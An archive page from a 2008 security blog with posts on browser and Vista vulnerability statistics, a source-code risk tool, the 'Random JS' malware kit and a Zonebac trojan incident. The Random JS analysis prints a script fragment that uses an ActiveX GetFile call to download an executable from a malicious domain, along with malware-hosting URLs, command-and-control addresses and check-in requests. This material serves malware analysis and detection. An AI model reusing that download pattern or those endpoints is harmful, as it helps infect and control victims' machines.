Archive for the 'Vulnerabilities & Exploits' Category

Download: Internet Explorer and Firefox Vulnerability Analysis

Published at April 15, 2008 in Applications and Vulnerabilities & Exploits. Comments

For most people, their web browser is central to their interaction with the Internet, connecting to global web sites and helping them consume online services providing everything from booking flights to banking services to online shopping. This reality makes browsers a key tool when evaluating the security experience of users as the browser interprets Web content and programs delivered from around the world.

Over the past few years, there has been much discussion of the need for improvements in browser security, but few hard data studies performed to support assertions concerning the security of available browsers.

This report documents the results of my analysis of Internet Explorer and Firefox vulnerabilities over the past few years since Internet Explorer 6 on Windows XP SP2 became available and Mozilla launched Firefox.

The report in detail examines vulnerabilities over the past 3 years, breaks them down by severity, looks at version-over-version trends for each browser and finally examines how each browser is doing in terms of unfixed vulnerabilities.

Download PDF List

Technorati Tags: , , , ,

Download: Windows Vista One Year Vulnerability Report

Published at April 15, 2008 in Articles and Vulnerabilities & Exploits. Comments

Windows Vista shipped to business customers on the last day of November 2006, so the end of November 2007 marks the one year anniversary for supported production use of the product.

This paper analyzes the vulnerability disclosures and security updates for the first year of Windows Vista and looks at it in the context of its predecessor, Windows XP, along with other modern workstation operating systems Red Hat, Ubuntu and Apple products.

The results of the analysis show that Windows Vista has an improved security vulnerability profile over its predecessor. Analysis of security updates also shows that Microsoft improvements to the security update process and development process have reduced the impact of security updates to Windows administrators significantly compared to its predecessor, Windows XP.

Download PDF List

Technorati Tags: , , , , ,

SCARE - Source Code Analysis Risk Evaluation Tool

Published at March 4, 2008 in Applications, Programming and Vulnerabilities & Exploits. Comments

The Source Code Analysis Risk Evaluation project is a study to create a security complexity metric that will analyze source code and provide a realistic and factual representation of the potential of that source code to create a problematic binary. This metric will not say that the binary will be exploited nor does it do a static analysis for known limitations like vulnerabilities. However it will flag code for a particular interaction type or control and allow the developer to understand which Operational Security (OpSec) holes are not protected even if it can’t say the effectiveness of that protection at this time.

This computation will provide a final SCARE value, like the RAV, where 100% is the proper balance between controls to OpSec holes and no Limitations. Conversely, less than that shows an imbalance where too few Controls protect OpSec holes or Limitations in OpSec and Controls degrade the security.

The SCARE analysis tool is run against source code. Currently only C code is supported. The output file will contain all operational interactions possible which need controls (the current version does not yet say if and what controls are already there). At the bottom of the list are three numbers: Visibilities, Access, and Trusts. These 3 numbers can be plugged into the RAV Calculation spreadsheet available at http://www.isecom.org/ravs. The Delta value is then subtracted from 100 to give the SCARE percentage which indicates the complexity for securing this particular application. The lower the value, the worse the SCARE.

At this stage, the tool cannot yet tell which interactions have controls already or if those controls are applicable however once that is available it will change the RAV but not the SCARE. The SCARE will also not yet tell you where the bugs are in the code however if you are bug hunting, it will extract all the places where user inputs and trusts with user-accessible resources can be found in the code.

Currently, SCARE is designed to work for any programming language. While this methodology shows the C language, they need input and feedback from developers of other languages to expand this further.

If you are interested in helping with this project please contact ISECOM.

You can download SCARE here:

scare_analyst.zip

Or you can read more here.

Technorati Tags: , , , , , , , ,

The Random JS Malware Exploitation Kit

Published at February 9, 2008 in Hacking Tools, Articles, Security and Vulnerabilities & Exploits. Comments

Random JS Sample 01The Random JS infection kit as originally named by Finjan, is perhaps the first publicly announced malicious innovation for 2008, in fact I've managed to obtain a copy of a sample .js and witness the filename change on the next request combined with complete disappearance of any .js on the third visit. Here's some press coverage - "Over 10,000 trusted websites infected by new Trojan toolkit" :

"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with the embedded malicious script once, it will not be referenced again on further requests. This method prevents detection of the malware in later forensic analyses."

And several more articles - "Hacking Toolkit Compromises Thousands Of Web Servers" ; "Trojan toolkit infected 10000 Web sites in December" ; "Legitimate sites serving up stealthy attacks". Compared to all of the malware embedded attacks during 2007 which were serving the malware from a secondary domain, as well as the exploits themselves, in attack technique is hosting everything on the infected domain. Sample random and local malware locations :

bunburyymas.com/ihkxtmzl
bunburyymas.com/odjiffkl
techicorner.com/bcuoixqf
otcash.com/ktehxwmj
otcash.com/soqutkue
otcash.com/bemkwijz

Sample .js random filenames :

cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;

Sample malware hosting URL snippet :

bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(

Copies of the malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came across to in the incident responses -- attempt to connect to 206.53.51.75, 206.53.56.30, and back39409404.com, making naughty web requests such as :

206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&
version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&
uptime=00:00:58:38

back39409404.com/cgi-bin/options.cgi?user_id=3335213046&
socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&
crc=3c64cb2e&uptime=00:00:58:35

The following files are partly accessible at the still active C&C's, the first one for instance :

  • cgi-bin/forms.cgi
  • cgi-bin/cert.cgi
  • cgi-bin/options.cgi
  • cgi-bin/ss.cgi
  • cgi-bin/pstore.cgi
  • cgi-bin/cmd.cgi
  • cgi-bin/file.cgi

Random JS Sample 01Did anti virus vendors come up with a detection pattern for the .js already? Partly.

Detection rate : Result: 11/32 (34.38%) JS.IEslice.aq; JS/SillyDlScript.DG; Exploit:JS/Mult.K
File size: 31679 bytes
MD5: 93152dc2392349d828526157bf601677
SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560

And now that we've witnessed the execution of such an advanced and random attack approach limiting the possibilities for assessing the impact of a malware embedded attack the way it was done so far, we can only speculate on what's to come by the end of the first quarter of 2008. From my perspective however, the smartest thing in this type of attack technique is that they limit the leads they leave behind to the minimum, thus, forwarding the responsibility to the infected host and limiting the possibility for easy expanding of the rest of their ecosystem. Moreover, despite that the module or the actual kit if it's really a kit is a Proprietary Malware Tool for the time being, it will sooner or later leak out, and turn into a commodity, just like MPack and IcePack are these days.

Technorati Tags: , ,

Adobe Reader Exploit Drops Trojan.Zonebac

Published at February 9, 2008 in Articles and Vulnerabilities & Exploits. Comments

As I was driving into work this morning, my blackberry was flooded with Trojan.Zonebac alerts. When I got into work, I could see that a single computer at one of our sites was getting this detection on pretty much every major exe. When I read the Technical writeup of Trojan.Zonebac at Symantec, I found out why. Zonebac searches for files referenced in the following registry subkeys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

For all the files found referenced in the registry subkey values, the Trojan creates a copy of the referenced file in a folder named "bak" at the same path as the original file. Then the Trojan will replace the original file with a copy of itself.

Now that is a mess. Normally, I see it as a fun challenge to clean machines, but in this case with so many EXEs suspect, and with the computer being remote, it seemed to be a better bet to wipe the system.

This evening the SANS Handler Diary had an entry revealing that the Adobe Reader/Professional vulnerability is currently being exploited and Zonebac is being dropped. That explains what happened.

It looks like I may have to move up my implementation of Adobe Reader 8.2.1

Brian Krebs' writeup on this reports that according to iDefense this was spreading through banner ads. [via]

Technorati Tags: , ,